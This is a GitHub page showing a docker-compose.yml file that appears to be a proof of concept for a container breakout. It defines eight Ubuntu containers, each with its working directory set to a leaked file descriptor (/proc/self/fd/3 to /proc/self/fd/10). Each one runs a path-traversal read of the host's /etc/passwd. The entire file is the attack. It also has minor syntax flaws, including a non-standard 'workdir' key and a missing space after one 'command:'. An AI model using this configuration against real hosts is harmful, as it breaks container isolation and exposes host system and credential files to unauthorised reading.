-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathdocker-compose.yml
42 lines (34 loc) · 933 Bytes
/
docker-compose.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
version: '3.8'
services:
container1:
image: ubuntu:22.04
command: cat ../../../../../etc/passwd
workdir: /proc/self/fd/3
container2:
image: ubuntu:22.04
command:cat ../../../../../etc/passwd
workdir: /proc/self/fd/4
container3:
image: ubuntu:22.04
command: cat ../../../../../etc/passwd
workdir: /proc/self/fd/5
container4:
image: ubuntu:22.04
command: cat ../../../../../etc/passwd
workdir: /proc/self/fd/6
container5:
image: ubuntu:22.04
command: cat ../../../../../etc/passwd
workdir: /proc/self/fd/7
container6:
image: ubuntu:22.04
command: cat ../../../../../etc/passwd
workdir: /proc/self/fd/8
container7:
image: ubuntu:22.04
command: cat ../../../../../etc/passwd
workdir: /proc/self/fd/9
container8:
image: ubuntu:22.04
command: cat ../../../../../etc/passwd
workdir: /proc/self/fd/10